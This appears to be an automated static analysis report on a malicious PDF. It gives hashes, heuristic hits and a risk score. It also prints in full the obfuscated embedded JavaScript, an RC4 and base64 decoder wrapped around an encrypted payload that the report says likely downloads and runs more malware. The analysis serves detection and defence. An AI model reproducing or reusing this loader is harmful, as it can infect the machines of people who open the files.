Malicious PDF — malware analysis report

Static analysis result for SHA-256 fe3751edff9f42a7…

MALICIOUS

PDF

5.1 KB Created: 2009-02-13 04:13:07 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 50ac894c75d14f62b6b54cd1f7cefc5b SHA-1: b79e0abd43fc6eabd824b4be687203ec0e7678dc SHA-256: fe3751edff9f42a70d3c50f6c4cb5721bb76cda461b8e29e746d0f3d19836427
134 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The JavaScript stream itself is obfuscated, as suggested by the 'Script obfuscation indicators' in the static triage. The extracted artifact 'javascript_obj0013_000.js' is also noted as suspicious. The obfuscated nature of the script prevents a definitive analysis of its exact payload, but its presence strongly suggests a malicious intent, likely to download and execute a secondary payload.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function musevep(ketudin,dodutob){var kamafo=[],nofetidi8,sefapipitu=0,kotiturami8,ketitodil='',pakat;for(nofetidi8=0;nofetidi8<256;nofetidi8++){kamafo[nofetidi8]=nofetidi8;}for(nofetidi8=0;nofetidi8<256;nofetidi8++){sefapipitu=(sefapipitu+kamafo[nofetidi8]+ketudin.charCodeAt(nofetidi8%ketudin.length))%256;kotiturami8=kamafo[nofetidi8];kamafo[nofetidi8]=kamafo[sefapipitu];kamafo[sefapipitu]=kotiturami8;}nofetidi8=0;sefapipitu=0;for(pakat=0;pakat<dodutob.length;pakat++){nofetidi8=(nofetidi8+1)%25 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x3CE 5384 bytes
SHA-256: 79b2b13a4cc9ab998b48e0ad1c5bad3b2f427065dc904a0ddb92b9b20e8644bd
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 68 of 109 identifiers look randomly generated (e.g. 'iZPCCKT4Wei9rtJF6lDTKjxpuRoTHjftp3n4pET8') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function musevep(ketudin,dodutob){var kamafo=[],nofetidi8,sefapipitu=0,kotiturami8,ketitodil='',pakat;for(nofetidi8=0;nofetidi8<256;nofetidi8++){kamafo[nofetidi8]=nofetidi8;}for(nofetidi8=0;nofetidi8<256;nofetidi8++){sefapipitu=(sefapipitu+kamafo[nofetidi8]+ketudin.charCodeAt(nofetidi8%ketudin.length))%256;kotiturami8=kamafo[nofetidi8];kamafo[nofetidi8]=kamafo[sefapipitu];kamafo[sefapipitu]=kotiturami8;}nofetidi8=0;sefapipitu=0;for(pakat=0;pakat<dodutob.length;pakat++){nofetidi8=(nofetidi8+1)%256;sefapipitu=(sefapipitu+kamafo[nofetidi8])%256;kotiturami8=kamafo[nofetidi8];kamafo[nofetidi8]=kamafo[sefapipitu];kamafo[sefapipitu]=kotiturami8;ketitodil+=String.fromCharCode(dodutob.charCodeAt(pakat)^kamafo[(kamafo[nofetidi8]+kamafo[sefapipitu])%256]);}return ketitodil;}var nudod=app.setTimeOut(musevep(mosamis("cnlzVUxucXVMNDZQMnZXeHo5OTdnQjk5bw=="),mosamis("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")),200);function mosamis(tosupi){tosupi=tosupi.replace(/[^a-z0-9\+\/=]/ig,'');var velilis='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',kofab5,sevonidapo,kolifinula3,komet,pusuvolor,rutifon,dibuto7,fabef=[],pabetu7,pabetu7=0;while((tosupi.length%4)!=0){tosupi+='=';}for(rimila=0;rimila<tosupi.length;rimila+=4){komet=velilis.indexOf(tosupi.charAt(rimila));pusuvolor=velilis.indexOf(tosupi.charAt(rimila+1));rutifon=velilis.indexOf(tosupi.charAt(rimila+2));dibuto7=velilis.indexOf(tosupi.charAt(rimila+3));kofab5=(komet<<2)|(pusuvolor>>4);sevonidapo=((pusuvolor&15)<<4)|(rutifon>>2);kolifinula3=((rutifon&3)<<6)|dibuto7;fabef[pabetu7++]=String.fromCharCode(kofab5);if(rutifon!=64)fabef[pabetu7++]=String.fromCharCode(sevonidapo);if(dibuto7!=64)fabef[pabetu7++]=String.fromCharCode(kolifinula3);}return fabef.join('');}

Open this report in the interactive analyzer, or submit your own file for analysis.